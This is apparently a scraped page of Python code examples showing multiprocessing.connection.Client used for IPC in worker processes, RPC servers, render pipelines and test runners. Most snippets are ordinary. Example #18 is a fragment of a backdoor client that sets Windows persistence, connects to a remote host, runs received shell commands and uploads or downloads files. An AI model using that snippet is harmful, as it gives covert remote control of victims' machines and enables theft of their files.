예제 #1
0
파일: main.py 프로젝트: mmatena/del8
def main(_):
    logging.info("Longleaf worker started.")
    logging.info(
        f"Waiting to connect to {FLAGS.listener_host}:{FLAGS.listener_port}")

    conn = connection.Client((FLAGS.listener_host, FLAGS.listener_port))
    logging.info(f"Connected to {FLAGS.listener_host}:{FLAGS.listener_port}")

    conn.send("CONNECTED")

    while True:
        msg = conn.recv()
        try:
            logging.info("Waiting for message from supervisor.")
            msg = conn.recv()
            logging.info("Message received.")
        except EOFError:
            logging.warning("[NOT FATAL] EOFError on conn.recv()")
            break

        msg = serialization.deserialize(msg)
        logging.info(f"Incoming msg: {msg}")

        if msg.type == messages.MessageType.PROCESS_ITEM:
            exe_item = msg.content.execution_item
            if isinstance(exe_item, str):
                exe_item = serialization.deserialize(exe_item)

            logging.info(
                f"Processing execution item: {serialization.serialize(exe_item, indent=2)}"
            )
            entrypoint.worker_run(**exe_item.worker_run_kwargs)

            response = messages.Message(
                type=messages.MessageType.PROCESS_ITEM,
                content=messages.ItemProcessed(
                    status=messages.ResponseStatus.SUCCESS),
            )
            logging.info("Successfully processed execution item")

            ser_res = serialization.serialize(response)
            logging.info("Sending response to supervisor.")
            conn.send(ser_res)

            logging.info("Clearing keras session.")
            tf.keras.backend.clear_session()

        else:
            raise ValueError(f"Message received with unknown type {msg.type}.")
예제 #2
0
 def _finalize_host(address, authkey, fcleanup, rcleanup):
     """ Sends a shutdown message and cleans up tunnels. """
     mgr_ok = OpenMDAO_Proxy.manager_is_alive(address)
     if mgr_ok:
         conn = connection.Client(address, authkey=authkey)
         try:
             managers.dispatch(conn, None, 'shutdown')
         except EOFError:
             pass
         finally:
             conn.close()
     if fcleanup is not None:
         fcleanup[0](*fcleanup[1:], **dict(keep_log=not mgr_ok))
     if rcleanup is not None:
         rcleanup[0](*rcleanup[1:], **dict(keep_log=not mgr_ok))
예제 #3
0
def send(objects: List[Any]) -> None:
    """Send objects from an iterable to a process running session().

    Raise ConnectionRefusedError if session() is not running.
    """
    # reading the address file, connecting to a windows named pipe and
    # connecting to an AF_UNIX socket all raise FileNotFoundError :D
    try:
        with _ADDRESS_FILE.open('r') as file:
            address = file.read().strip()
        client = connection.Client(address)
    except FileNotFoundError:
        raise ConnectionRefusedError("session() is not running") from None

    with client:
        for message in objects:
            client.send(message)
예제 #4
0
def listvars():
    global glob_hosts
    if not glob_hosts:
        print "\n".join(sorted(glob_vals.keys()))
        return
    mylist = []
    for host in glob_hosts:
        conn = connection.Client(
            host,
            authkey=PROJECT_AUTHKEY,
        )
        conn.send(REQUEST_LIST())
        reply = conn.recv()
        conn.close()
        mylist.extend(reply.items)
    print("\n".join(sorted(mylist)))
    return
예제 #5
0
        def read_thread():
            """
            Launch the read thread. This will attempt to create a connection to a te server
            controller and listen for incoming data. This thread will stay alive until the process
            closes.
            """

            while True:

                # First connect to the server
                try:
                    self.__conn = mpc.Client(('localhost', port),
                                             authkey=SECRET)
                    self.__botchan_send('Terraria server manager connected!')

                # Leaving unassigned or closing skips the next loop
                except (EOFError, ConnectionRefusedError, ConnectionResetError,
                        BrokenPipeError):
                    if self.__conn is not None:
                        self.__conn.close()
                        time.sleep(
                            10
                        )  # Wait a reasonable amount of time and chek again

                # Read loop
                while self.__conn and (not self.__conn.closed):

                    # Try to read and direct messages appropriately
                    try:
                        line = self.__conn.recv()
                        [status, msg] = line.split('|', 1)
                        status = status.strip()
                        if status == 'LOG':
                            self.__logchan_send(msg)
                        elif status == 'OK':
                            self.__botchan_send(msg)
                        else:
                            self.__botchan_send(f'{status}: {msg}')

                    # Close the connection so we end the loop and try to reconnect at the top
                    except (EOFError, ConnectionResetError, BrokenPipeError):
                        self.__botchan_send(
                            'ERR: The Terraria server manager crashed. Attempting '
                            'to reconnect')
                        self.__conn.close()
예제 #6
0
def procserver(session_export, conn):
    # init logging system
    rlog = multiprocessing.log_to_stderr()
    rlog.setLevel(session_export['logLevel'])

    # make a real session from the "session" we got
    ssn = import_session(rlog, session_export)

    if isinstance(conn, Sequence):
        conn = connection.Client(conn[:2], authkey=conn[2])

    event = SubprocessEvent(ssn.testLoader,
                            ssn.testResult,
                            ssn.testRunner,
                            ssn.plugins,
                            conn)
    res = ssn.hooks.startSubprocess(event)
    if event.handled and not res:
        conn.send(None)
        conn.close()
        ssn.hooks.stopSubprocess(event)
        return
    # receive and run tests
    executor = event.executeTests
    for testid in gentests(conn):
        if testid is None:
            break
        # XXX to handle weird cases like layers, need to
        # deal with the case that testid is something other
        # than a simple string.
        test = event.loader.loadTestsFromName(testid)
        # XXX If there a need to protect the loop? try/except?
        rlog.debug("Execute test %s (%s)", testid, test)
        executor(test, event.result)
        events = [e for e in ssn.hooks.flush()]
        try:
            conn.send((testid, events))
            rlog.debug("Log for %s returned", testid)
        except:
            rlog.exception("Fail sending event %s: %s" % (testid, events))
            # Send empty event list to unblock the conn.recv on main process.
            conn.send((testid, []))
    conn.send(None)
    conn.close()
    ssn.hooks.stopSubprocess(event)
예제 #7
0
def load(variable):
    global glob_vals
    if variable in glob_vals:
        return glob_vals[variable]
    for host in glob_hosts:
        conn = connection.Client(
            host,
            authkey=PROJECT_AUTHKEY,
        )
        conn.send(REQUEST_GET_VALUE(variable))
        reply = conn.recv()
        conn.close()
        if isinstance(reply, I_DONT_KNOW):
            continue
        elif isinstance(reply, RESPONSE_GET_VALUE):
            return reply.value
    print("Error: Interpreter: no variable named {}".format(variable))
    raise ValueError
예제 #8
0
 def _clientSend(self, data):
     try:
         client = multi_con.Client(address=self._address,
                                   authkey=self._authKey)
         client.send(data)
         client.close()
     except ConnectionRefusedError:
         traceLog(
             LogLevel.ERROR,
             "ComManager: Client connection refused. Listener likely not started"
         )
     except multi_con.AuthenticationError:
         traceLog(LogLevel.WARNING,
                  "ComManager: Client authentication error")
     except Exception as e:
         traceLog(
             LogLevel.ERROR, "ComManager: Client exception [%s]: %s" %
             (str(type(e).__name__), str(e)))
예제 #9
0
def store(variable, expression):
    global glob_vals
    global glob_hosts
    if variable in glob_vals:
        glob_vals[variable] = expression
    # try to set on all other hosts
    for host in glob_hosts:
        conn = connection.Client(
            host,
            authkey=PROJECT_AUTHKEY,
        )
        conn.send(REQUEST_SET_VALUE(variable, expression))
        reply = conn.recv()
        conn.close()
        if isinstance(reply, I_DONT_KNOW):
            continue
        elif isinstance(reply, ACK):
            return
    # if that fails, set locally
    glob_vals[variable] = expression
예제 #10
0
    def from_address(cls, address, authkey, host):
        """
        Return manager given an address.

        address: (ip_addr, port) or string referring to pipe.
            Address to connect to.

        authkey: string
            Authorization key.

        host: :class:`Host`
            Host we're managing.
        """
        if host.tunnel_outgoing:
            _LOGGER.debug('Client setting up tunnel for %s:%s', host.hostname,
                          address[1])
            address, cleanup = setup_tunnel(host.hostname,
                                            address[1],
                                            identity=host.identity_filename)
        else:
            cleanup = None

        manager = cls(address, authkey)
        _LOGGER.debug('Client connecting to server at %s' % (address, ))
        conn = connection.Client(address, authkey=authkey)
        try:
            managers.dispatch(conn, None, 'dummy')
        finally:
            conn.close()
        manager._state.value = managers.State.STARTED
        manager._name = 'Host-%s:%s' % manager.address
        manager.shutdown = util.Finalize(manager,
                                         HostManager._finalize_host,
                                         args=(manager._address,
                                               manager._authkey, cleanup,
                                               host.reverse_cleanup),
                                         exitpriority=-10)
        return manager
    def serve_events(self):
        self.logger.info("started thread server %s", self.name)
        while not self.stop_executing:
            # time.sleep(3)
            for e in self.events:
                # if not e.is_real_owner:
                #     if not e.sent_at or (e.sent_at and (self.timer - e.sent_at) > 1000):
                #         e.sent_at = self.timer
                #         for a in self.all_address:
                #             conn = connection.Client(a, authkey=AUTH_KEY)
                #             conn.send(e.get_normalised_data())
                #             conn.close()
                if e.is_real_owner and not e.sent_at:
                    # e.acknowledged = True
                    e.sent_at = self.timer
                    for i, a in enumerate(self.all_address):
                        if i == self.id:
                            continue

                        conn = connection.Client(a, authkey=AUTH_KEY)
                        conn.send(e.get_normalised_data())
                        conn.close()

        self.logger.info("stopped serving events")
예제 #12
0
def runner(data):
    assert 'SOCKET' in os.environ, 'SOCKET env var is not set'
    assert 'AGENT_CONTROLLER_URL' in os.environ, 'Missing AGENT_CONTROLLER_URL'
    assert 'AGENT_GID' in os.environ, 'Missing AGENT_GID'
    assert 'AGENT_NID' in os.environ, 'Missing AGENT_NID'

    socket = os.environ['SOCKET']
    con = connection.Client(socket)

    # Hash will get processed by the daemon as follows
    # It will contact the agentcontroller to retrieve the cached script
    # and execute it normally.
    # we also collect the controller variables from env vars.
    controller = {
        'gid': os.environ['AGENT_GID'],
        'nid': os.environ['AGENT_NID'],
        'url': os.environ['AGENT_CONTROLLER_URL'],
        'name': os.environ['AGENT_CONTROLLER_NAME'],
        'ca': os.environ.get('AGENT_CONTROLLER_CA', None),
        'client_cert': os.environ.get('AGENT_CONTROLLER_CLIENT_CERT', None),
        'client_cert_key': os.environ.get('AGENT_CONTROLLER_CLIENT_CERT_KEY',
                                          None)
    }

    exec_data = {
        'data': data['args'],  # script args
        'hash': data.get('hash', None),
        'controller': controller
    }

    con.send(exec_data)

    code = reader.readResponseToEnd(con)
    con.close()

    sys.exit(code)
예제 #13
0
def sendTo(args):
    conn = connection.Client(address, authkey="hello")
    conn.send(args)
    print("message out from {}".format(name))
예제 #14
0
def main(pipeline_path, connection_addresses, shared_dic, log_path, debug_mode):
    log_level = log.DEBUG if debug_mode else log.INFO
    setup_logging(log_path, log_level)
    log.info('DEBUG MODE: {}'.format(debug_mode))

    # Trying to change process prioriy in Linux seems to hang Malt for some users
    if sys.platform == 'win32':
        import psutil
        psutil.Process().nice(psutil.REALTIME_PRIORITY_CLASS)

    log.info('CONNECTIONS:')
    connections = {}
    for name, address in connection_addresses.items():
        log.info('Name: {} Adress: {}'.format(name, address))
        connections[name] = connection.Client(address)
    
    glfw.ERROR_REPORTING = True
    glfw.init()

    glfw.window_hint(glfw.CONTEXT_VERSION_MAJOR, 4)
    glfw.window_hint(glfw.CONTEXT_VERSION_MINOR, 1)
    
    window = glfw.create_window(256, 256, 'Malt', None, None)
    glfw.make_context_current(window)
    # Don't hide for better OS/Drivers schedule priority
    #glfw.hide_window(window)
    # Minimize instead:
    glfw.iconify_window(window)

    glfw.swap_interval(0)

    log_system_info()
    
    log.info('INIT PIPELINE: ' + pipeline_path)

    pipeline_dir, pipeline_name = os.path.split(pipeline_path)
    if pipeline_dir not in sys.path:
        sys.path.append(pipeline_dir)
    module_name = pipeline_name.split('.')[0]
    module = __import__(module_name)

    pipeline_class = module.PIPELINE
    pipeline_class.SHADER_INCLUDE_PATHS.append(pipeline_dir)
    pipeline = pipeline_class()

    params = pipeline.get_parameters()
    connections['PARAMS'].send(params)

    viewports = {}
    last_exception = ''
    repeated_exception = 0

    while glfw.window_should_close(window) == False:
        
        try:
            profiler = cProfile.Profile()
            profiling_data = io.StringIO()
            global PROFILE
            if PROFILE:
                profiler.enable()
            
            start_time = time.perf_counter()

            glfw.poll_events()

            while connections['MATERIAL'].poll():
                msg = connections['MATERIAL'].recv()
                log.debug('COMPILE MATERIAL : {}'.format(msg))
                path = msg['path']
                search_paths = msg['search_paths']
                material = Bridge.Material.Material(path, pipeline, search_paths)
                connections['MATERIAL'].send(material)
            
            while connections['MESH'].poll():
                msg = connections['MESH'].recv()
                msg_log = copy.copy(msg)
                msg_log['data'] = None
                log.debug('LOAD MESH : {}'.format(msg_log))
                load_mesh(msg)
            
            while connections['TEXTURE'].poll():
                msg = connections['TEXTURE'].recv()
                log.debug('LOAD TEXTURE : {}'.format(msg))
                name = msg['name']
                resolution = msg['resolution']
                channels = msg['channels']
                buffer_name = msg['buffer_name']
                sRGB = msg['sRGB']
                w,h = resolution
                size = w*h*channels
                buffer = ipc.SharedMemoryRef(buffer_name, size*ctypes.sizeof(ctypes.c_float))
                float_buffer = (ctypes.c_float*size).from_address(buffer.c.data)
                load_texture(name, resolution, channels, float_buffer, sRGB)
                connections['TEXTURE'].send('COMPLETE')
            
            while connections['GRADIENT'].poll():
                msg = connections['GRADIENT'].recv()
                msg_log = copy.copy(msg)
                msg_log['pixels'] = None
                log.debug('LOAD GRADIENT : {}'.format(msg_log))
                name = msg['name']
                pixels = msg['pixels']
                nearest = msg['nearest']
                load_gradient(name, pixels, nearest)
            
            #TODO: Bad workaround to make sure the scene assets are loaded
            if connections['RENDER'].poll():
                needs_loading = False
                for key in ['MATERIAL','MESH','TEXTURE','GRADIENT']:
                    if connections[key].poll():
                        needs_loading = True
                if needs_loading:
                    continue
            
            setup_viewports = {}
            while connections['RENDER'].poll():
                msg = connections['RENDER'].recv()
                log.debug('SETUP RENDER : {}'.format(msg))
                setup_viewports[msg['viewport_id']] = msg

            for msg in setup_viewports.values():
                viewport_id = msg['viewport_id']
                resolution = msg['resolution']
                scene = msg['scene']
                scene_update = msg['scene_update']
                buffer_names = msg['buffer_names']
                w,h = resolution
                buffers = {}
                for key, buffer_name in buffer_names.items():
                    if buffer_name:
                        buffers[key] = ipc.SharedMemoryRef(buffer_name, w*h*4*4)

                if viewport_id not in viewports:
                    viewports[viewport_id] = Viewport(pipeline_class(), viewport_id == 0)

                viewports[viewport_id].setup(buffers, resolution, scene, scene_update)
                shared_dic[(viewport_id, 'FINISHED')] = False
            
            active_viewports = {}
            render_finished = True
            for v_id, v in viewports.items():
                if v.needs_more_samples:
                    active_viewports[v_id] = v
                has_finished = v.render()
                if has_finished == False:
                    render_finished = False
                shared_dic[(v_id, 'READ_RESOLUTION')] = v.read_resolution
                if has_finished and shared_dic[(v_id, 'FINISHED')] == False:
                    shared_dic[(v_id, 'FINISHED')] = True
            
            if render_finished:
                glfw.swap_interval(1)
            else:
                glfw.swap_interval(0)
            glfw.swap_buffers(window)

            if len(active_viewports) > 0:
                stats = ''
                for v_id, v in active_viewports.items():
                    stats += "Viewport ({}):\n{}\n\n".format(v_id, v.get_print_stats())
                shared_dic['STATS'] = stats
                log.debug('STATS: {} '.format(stats))
            
            if PROFILE:
                profiler.disable()
                stats = pstats.Stats(profiler, stream=profiling_data)
                stats.strip_dirs()
                stats.sort_stats(pstats.SortKey.CUMULATIVE)
                stats.print_stats()
                if active_viewports:
                    log.debug(profiling_data.getvalue())
        except (ConnectionResetError, EOFError):
            #Connection Lost
            break
        except:
            import traceback
            exception = traceback.format_exc()
            if exception != last_exception:
                log.error(exception)
                repeated_exception = 0
                last_exception = exception
            else:
                if repeated_exception in (1,10,100,1000,10000,100000):
                    log.error('(Repeated {}+ times)'.format(repeated_exception))
                repeated_exception += 1

    glfw.terminate()
예제 #15
0
def open_window():
    client = connection.Client(address, authkey=b"limits auth")
    client.send(b"open_window")
 def run(self):
     """Instantiates a connection.Client."""
     self._client = connection.Client(self._address)
예제 #17
0
파일: Server.py 프로젝트: bnpr/Malt
def main(pipeline_path, viewport_bit_depth, connection_addresses, shared_dic,
         lock, log_path, debug_mode, plugins_paths):
    log_level = LOG.DEBUG if debug_mode else LOG.INFO
    setup_logging(log_path, log_level)
    LOG.info('DEBUG MODE: {}'.format(debug_mode))

    LOG.info('CONNECTIONS:')
    connections = {}
    for name, address in connection_addresses.items():
        LOG.info('Name: {} Adress: {}'.format(name, address))
        connections[name] = connection.Client(address)

    glfw.ERROR_REPORTING = True
    glfw.init()

    glfw.window_hint(glfw.CONTEXT_VERSION_MAJOR, 4)
    glfw.window_hint(glfw.CONTEXT_VERSION_MINOR, 1)
    glfw.window_hint(glfw.OPENGL_PROFILE, glfw.OPENGL_CORE_PROFILE)

    window = glfw.create_window(256, 256, 'Malt', None, None)
    glfw.make_context_current(window)
    # Don't hide for better OS/Drivers schedule priority
    #glfw.hide_window(window)
    # Minimize instead:
    glfw.iconify_window(window)

    glfw.swap_interval(0)

    log_system_info()

    LOG.info('INIT PIPELINE: ' + pipeline_path)

    pipeline_dir, pipeline_name = os.path.split(pipeline_path)
    if pipeline_dir not in sys.path:
        sys.path.append(pipeline_dir)
    module_name = pipeline_name.split('.')[0]
    module = __import__(module_name)

    pipeline_class = module.PIPELINE
    pipeline_class.SHADER_INCLUDE_PATHS.append(pipeline_dir)
    plugins = []
    for dir in plugins_paths:
        plugins += load_plugins_from_dir(dir)
    pipeline = pipeline_class(plugins)

    params = pipeline.get_parameters()
    graphs = pipeline.get_graphs()
    outputs = pipeline.get_render_outputs()
    connections['MAIN'].send({
        'msg_type': 'PARAMS',
        'params': params,
        'graphs': graphs,
        'outputs': outputs
    })

    viewports = {}
    last_exception = ''
    repeated_exception = 0

    while glfw.window_should_close(window) == False:

        try:
            profiler = cProfile.Profile()
            profiling_data = io.StringIO()
            global PROFILE
            if PROFILE:
                profiler.enable()

            start_time = time.perf_counter()

            glfw.poll_events()

            while connections['REFLECTION'].poll():
                msg = connections['REFLECTION'].recv()
                if msg['msg_type'] == 'SHADER REFLECTION':
                    LOG.debug('REFLECT SHADER : {}'.format(msg))
                    paths = msg['paths']
                    results = {}
                    from Malt.GL.Shader import glsl_reflection, shader_preprocessor
                    for path in paths:
                        root_path = os.path.dirname(path)
                        src = '#include "{}"\n'.format(path)
                        src = shader_preprocessor(src, [root_path])
                        reflection = glsl_reflection(src, root_path)
                        reflection['paths'] = set([path])
                        for struct in reflection['structs'].values():
                            reflection['paths'].add(struct['file'])
                        for function in reflection['functions'].values():
                            reflection['paths'].add(function['file'])
                        results[path] = reflection
                    connections['REFLECTION'].send(results)
                if msg['msg_type'] == 'GRAPH RELOAD':
                    graph_types = msg['graph_types']
                    for type in graph_types:
                        pipeline.graphs[type].setup_reflection()
                    for viewport in viewports.values():
                        viewport.pipeline.graphs = pipeline.graphs
                    graphs = pipeline.get_graphs()
                    connections['REFLECTION'].send(graphs)

            while connections['MAIN'].poll():
                msg = connections['MAIN'].recv()

                if msg['msg_type'] == 'MATERIAL':
                    LOG.debug('COMPILE MATERIAL : {}'.format(msg))
                    path = msg['path']
                    search_paths = msg['search_paths']
                    custom_passes = msg['custom_passes']
                    material = Bridge.Material.Material(
                        path, pipeline, search_paths, custom_passes)
                    connections['MAIN'].send({
                        'msg_type': 'MATERIAL',
                        'material': material
                    })

                if msg['msg_type'] == 'MESH':
                    msg_log = copy.copy(msg)
                    msg_log['data'] = None
                    LOG.debug('LOAD MESH : {}'.format(msg_log))
                    Bridge.Mesh.load_mesh(msg)

                if msg['msg_type'] == 'TEXTURE':
                    LOG.debug('LOAD TEXTURE : {}'.format(msg))
                    Bridge.Texture.load_texture(msg)

                if msg['msg_type'] == 'GRADIENT':
                    msg_log = copy.copy(msg)
                    msg_log['pixels'] = None
                    LOG.debug('LOAD GRADIENT : {}'.format(msg_log))
                    name = msg['name']
                    pixels = msg['pixels']
                    nearest = msg['nearest']
                    Bridge.Texture.load_gradient(name, pixels, nearest)

                if msg['msg_type'] == 'RENDER':
                    LOG.debug('SETUP RENDER : {}'.format(msg))
                    viewport_id = msg['viewport_id']
                    resolution = msg['resolution']
                    scene = msg['scene']
                    scene_update = msg['scene_update']
                    new_buffers = msg['new_buffers']
                    renderdoc_capture = msg['renderdoc_capture']

                    if viewport_id not in viewports:
                        bit_depth = viewport_bit_depth if viewport_id != 0 else 32
                        viewports[viewport_id] = Viewport(
                            pipeline_class(plugins), viewport_id == 0,
                            bit_depth)

                    viewports[viewport_id].setup(new_buffers, resolution,
                                                 scene, scene_update,
                                                 renderdoc_capture)
                    shared_dic[(viewport_id, 'FINISHED')] = False
                    shared_dic[(viewport_id, 'SETUP')] = True

            active_viewports = {}
            render_finished = True
            for v_id, v in viewports.items():
                if v.needs_more_samples:
                    active_viewports[v_id] = v
                has_finished = v.render()
                if has_finished == False:
                    render_finished = False
                shared_dic[(v_id, 'READ_RESOLUTION')] = v.read_resolution
                if has_finished and shared_dic[(v_id, 'FINISHED')] == False:
                    shared_dic[(v_id, 'FINISHED')] = True

            if render_finished:
                glfw.swap_interval(1)
            else:
                glfw.swap_interval(0)
            glfw.swap_buffers(window)

            if len(active_viewports) > 0:
                stats = ''
                for v_id, v in active_viewports.items():
                    stats += "Viewport ({}):\n{}\n\n".format(
                        v_id, v.get_print_stats())
                shared_dic['STATS'] = stats
                LOG.debug('STATS: {} '.format(stats))

            if PROFILE:
                profiler.disable()
                stats = pstats.Stats(profiler, stream=profiling_data)
                stats.strip_dirs()
                stats.sort_stats(pstats.SortKey.CUMULATIVE)
                stats.print_stats()
                if active_viewports:
                    LOG.debug(profiling_data.getvalue())
        except (ConnectionResetError, EOFError):
            #Connection Lost
            break
        except:
            import traceback
            exception = traceback.format_exc()
            if exception != last_exception:
                LOG.error(exception)
                repeated_exception = 0
                last_exception = exception
            else:
                if repeated_exception in (1, 10, 100, 1000, 10000, 100000):
                    LOG.error(
                        '(Repeated {}+ times)'.format(repeated_exception))
                repeated_exception += 1

    glfw.terminate()
예제 #18
0
        if command.startswith("cd"):
            os.chdir(command.split(' ')[1])
            results = b"[+] Changed into: " + os.getcwd().encode()
        elif command.startswith("download"):
            filepath = command.split(' ')[1]
            results = get_file_contents(filepath)
        elif command.startswith("upload"):
            filename = command.split(' ')[1].split('/')[-1]
            conn.send_bytes(b"Ready")
            file_contents = conn.recv_bytes()
            if not file_contents.startswith(b"Failed"):
                write_file(filename, file_contents)
            return
        else:
            results = check_output(command, shell=True, stderr=DEVNULL, stdin=DEVNULL)
    except:
        results = b"[-] Failed to execute " + command.encode()

    conn.send_bytes(results)

try:
    become_windows_persistent()
    open_windows_data_file()
    with connection.Client((address, port), authkey=key) as conn:
        while True:
            command = conn.recv()
            execute(conn, command)
except:
    sys.exit()

예제 #19
0
import multiprocessing as mp
import multiprocessing.connection as mpc
import threading
import os
import sys

from dotenv import load_dotenv

# Load Env
load_dotenv()
SECRET = str.encode(os.getenv('SECRET'))

# Connect
address = ('localhost', int(sys.argv[1]))
conn = mpc.Client(address, authkey=SECRET)


def read_thread():
    while not conn.closed:
        line = conn.recv()
        print(line, end='')


reader = threading.Thread(target=read_thread)
reader.daemon = True
reader.start()

cmd = 'x'
while cmd:
    cmd = input()
    conn.send(cmd)
예제 #20
0

if args.path is None and not args.stop:
    parser.print_usage()
    exit()

clip_to_play = args.path

if not args.stop:
    playing_process = multiprocessing.Process(target=play)
    playing_process.start()

time.sleep(0.2)

try:
    with ipc.Client(file_mutex_path) as conn:
        conn.send(stop_command)
except:
    pass
if args.stop:
    exit(0)

for i in range(0,10):
    try:
        with ipc.Listener(file_mutex_path) as srv:
            with srv.accept() as conn:
                if conn.recv() == stop_command:
                    playing_process.terminate()
                else:
                    print("wtf is this", file=sys.stderr)
    except OSError as e:
예제 #21
0
 def fake_client(address):
     client = connection.Client(address)
     time.sleep(10)
     client.close()
예제 #22
0
        def do_rpc(*args, **kwargs):
            self._connection.send(pickle.dumps((name, args, kwargs)))
            result = pickle.loads(self._connection.recv())
            if isinstance(result, Exception):
                raise result
            return result

        return do_rpc


if __name__ == '__main__':
    import argparse

    parser = argparse.ArgumentParser()
    parser.add_argument('mod', type=str, help="server or proxy")
    args = parser.parse_args()

    mod = args.mod

    if mod == 'server':
        handler = RPCHandler()
        handler.register(add)
        handler.register(now)
        server = RPCServer(handler, ("", 20001), b"rpc")
        server.serve_forever()
    elif mod == 'proxy':
        client = connection.Client(address=("localhost", 20001), authkey=b"rpc")
        proxy = RPCProxy(client)
        print(proxy.add(1, 2))
        print(proxy.now())
예제 #23
0
 def _send_message(self, msg):
     conn = connection.Client(self._address, self._family, authkey=self._authkey)
     try:
         conn.send(msg)
     finally:
         conn.close()
예제 #24
0
 def __init__(self, host='localhost', port=6001, authkey=b'password'):
     self.conn = connection.Client((host, port), authkey=authkey)
예제 #25
0
from config import ADDRESS

interactive = "--pickle" not in sys.argv

if interactive:
    print('[CCCC  OOOO  MM  MM  MM  MM   AA   N  N]')
    print('[C     O  O  M MM M  M MM M  A  A  NN N]')
    print('[C     O  O  M MM M  M MM M  AAAA  N NN]')
    print('[CCCC  OOOO  M    M  M    M  A  A  N  N]')
    print()
    print("Welcome to comman cli")

run = True
while run:
    try:
        with mpc.Client(ADDRESS, family='AF_UNIX') as client:
            inp = shlex.split(input())
            client.send(inp)
            response = client.recv()
            if interactive:
                print(*response, sep=' ')
            else:
                print(pickle.dumps(response))
            run = inp[0].upper() not in ('EXIT', 'STOP')

    except Exception as e:
        if interactive:
            print('AN ERROR OCCURED: ' + type(e))
        else:
            print(pickle.dumps(e))
예제 #26
0
 def fake_client(address):
     client = connection.Client(address)
     time.sleep(self.plugin.testRunTimeout)
     client.close()
def sendTo(args):
    conn = connection.Client(address, authkey="hello")
    conn.send(args)
예제 #28
0
def main(args):
    try:
        __assertSingleInstance()
        parser = option_parser()
        args = parser.parse_args(args=args)

        # Override user and group if called with --user and --group.
        constants.VDSM_USER = args.user
        constants.VDSM_GROUP = args.group

        # Override storage-repository, used to verify file access.
        sc.REPO_DATA_CENTER = args.data_center
        sc.REPO_MOUNT_DIR = os.path.join(args.data_center, sc.DOMAIN_MNT_POINT)

        try:
            logging.config.fileConfig(args.logger_conf,
                                      disable_existing_loggers=False)
        except Exception as e:
            raise FatalError("Cannot configure logging: %s" % e)

        log = logging.getLogger("SuperVdsm.Server")
        sockfile = args.sockfile
        pidfile = args.pidfile
        if not config.getboolean('vars', 'core_dump_enable'):
            resource.setrlimit(resource.RLIMIT_CORE, (0, 0))
        sigutils.register()
        zombiereaper.registerSignalHandler()

        def bind(func):
            def wrapper(_SuperVdsm, *args, **kwargs):
                return func(*args, **kwargs)
            return wrapper

        if args.enable_gluster:
            for name, func in listPublicFunctions(
                    constants.GLUSTER_MGMT_ENABLED):
                setattr(_SuperVdsm, name, bind(logDecorator(func)))

        for _, module_name, _ in pkgutil.iter_modules([supervdsm_api.
                                                       __path__[0]]):
            module = importlib.import_module('%s.%s' %
                                             (supervdsm_api.__name__,
                                              module_name))
            api_funcs = [f for _, f in six.iteritems(module.__dict__)
                         if callable(f) and getattr(f, 'exposed_api', False)]
            for func in api_funcs:
                setattr(_SuperVdsm, func.__name__, bind(logDecorator(func)))

        log.debug("Making sure I'm root - SuperVdsm")
        if os.geteuid() != 0:
            sys.exit(errno.EPERM)

        if pidfile:
            pid = str(os.getpid())
            with open(pidfile, 'w') as f:
                f.write(pid + "\n")

        log.debug("Parsing cmd args")
        address = sockfile

        log.debug("Cleaning old socket %s", address)
        if os.path.exists(address):
            os.unlink(address)

        log.debug("Setting up keep alive thread")

        try:
            signal.signal(signal.SIGTERM, terminate)
            signal.signal(signal.SIGINT, terminate)

            log.debug("Creating remote object manager")
            manager = _SuperVdsmManager(address=address, authkey=_AUTHKEY)
            manager.register('instance', callable=_SuperVdsm)

            server = manager.get_server()
            server_thread = concurrent.thread(server.serve_forever)
            server_thread.start()

            chown(address, args.user, args.group)

            if args.enable_network:
                init_privileged_network_components()

            log.debug("Started serving super vdsm object")

            while _running:
                sigutils.wait_for_signal()

            log.debug("Terminated normally")
        finally:
            try:
                with connection.Client(address, authkey=_AUTHKEY) as conn:
                    server.shutdown(conn)
                server_thread.join()
            except Exception:
                # We ignore any errors here to avoid a situation where systemd
                # restarts supervdsmd just at the end of shutdown stage. We're
                # prepared to handle any mess (like existing outdated socket
                # file) in the startup stage.
                log.exception("Error while shutting down supervdsm")

    except Exception as e:
        syslog.syslog("Supervdsm failed to start: %s" % e)
        # Make it easy to debug via the shell
        raise
예제 #29
0
def main():  #pragma no cover
    """
    Code which runs a host manager.
    Expects configuration data from parent on `stdin`.
    Replies with address and optionally public key.
    The environment variable ``OPENMDAO_KEEPDIRS`` can be used to avoid
    removal of the temporary directory used here.
    """
    sys.stdout = open('stdout', 'w')
    sys.stderr = open('stderr', 'w')

    #    util.log_to_stderr(logging.DEBUG)
    # Avoid root possibly masking us.
    logging.getLogger().setLevel(logging.DEBUG)

    import platform
    hostname = platform.node()
    pid = os.getpid()
    ident = '(%s:%d)' % (hostname, pid)
    print '%s main startup' % ident
    sys.stdout.flush()

    # Get data from parent over stdin.
    data = cPickle.load(sys.stdin)
    sys.stdin.close()
    print '%s data received' % ident

    authkey = data['authkey']
    allow_shell = data['allow_shell']
    allowed_users = data['allowed_users']
    print '%s using %s authentication' % (ident, keytype(authkey))
    if allowed_users is None:
        print '%s allowed_users: ANY' % ident
    else:
        print '%s allowed_users: %s' % (ident, sorted(allowed_users.keys()))
    if allow_shell:
        print '%s ALLOWING SHELL ACCESS' % ident
    sys.stdout.flush()
    log_level = data['dist_log_level']
    os.environ['OPENMDAO_KEEPDIRS'] = data['keep_dirs']

    exc = None
    server = None
    try:
        # Update HostManager registry.
        dct = data['registry']
        print '%s registry:' % ident
        for name in dct.keys():
            module = dct[name]
            print '    %s: %s' % (name, module)
            mod = __import__(module, fromlist=name)
            cls = getattr(mod, name)
            register(cls, HostManager)

        # Set some stuff.
        print '%s preparing to fork, log level %d' % (ident, log_level)
        sys.stdout.flush()
        util.get_logger().setLevel(log_level)
        forking.prepare(data)

        # Create Server for a HostManager object.
        name = '%d[%d]' % (data['index'], pid)
        logging.getLogger(name).setLevel(log_level)
        server = OpenMDAO_Server(HostManager._registry, (hostname, 0),
                                 authkey,
                                 'pickle',
                                 name=name,
                                 allowed_users=allowed_users,
                                 allowed_hosts=[data['parent_address'][0]])
    except Exception as exc:
        print '%s caught exception: %s' % (ident, exc)

    # Report server address and public key back to parent.
    print '%s connecting to parent at %s' % (ident, data['parent_address'])
    sys.stdout.flush()
    conn = connection.Client(data['parent_address'], authkey=authkey)
    if exc:
        conn.send((data['index'], None, str(exc)))
    else:
        conn.send((data['index'], server.address, server.public_key_text))
    conn.close()

    if exc:
        print '%s exiting' % ident
        sys.exit(1)

    # Set name etc.
    current_process()._server = server
    current_process()._name = 'Host-%s:%s' % server.address
    current_process().authkey = authkey
    logging.getLogger(current_process()._name).setLevel(log_level)
    util._run_after_forkers()

